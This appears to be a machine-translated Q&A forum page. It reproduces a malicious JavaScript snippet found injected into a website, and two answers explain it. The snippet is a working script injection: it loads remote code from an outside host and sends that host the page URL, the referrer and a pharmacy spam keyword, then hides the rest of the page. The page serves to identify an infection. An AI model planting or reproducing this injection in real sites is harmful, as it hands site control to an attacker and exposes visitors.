<SCRIPT>
ff = 0;
for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1;
if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase ()) && false ) ) {
document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>' ); document.write ('<' + '!--' );
}
</SCRIPT>
识别此代码?我看到它被困在许多网站中,但所有的角色都被替换为十六进制或八进制等效。有人在我父亲的一个网站上的帖子中发布了这段代码,但我无法弄清楚它在做什么。它似乎正在收集引用者的网页映射,但我无法弄清楚前几行是做什么的。任何人都知道这里发生了什么?
答案 0 :(得分:5)
它正在向页面写一个脚本标记,指向他们的javascript。他们的javascript将在您的网站上执行,让他们随心所欲地为您的网站做好准备。
前几行只是对可能在其脚本中创建的变量进行的一些检查。也许与检查脚本标签是否已被写入有关。
答案 1 :(得分:2)
它正在检查依赖项(由其他代码设置的javascript变量),然后它拨回主页让家庭服务器知道它成功感染了哪个页面。 Home appears to be here在基辅。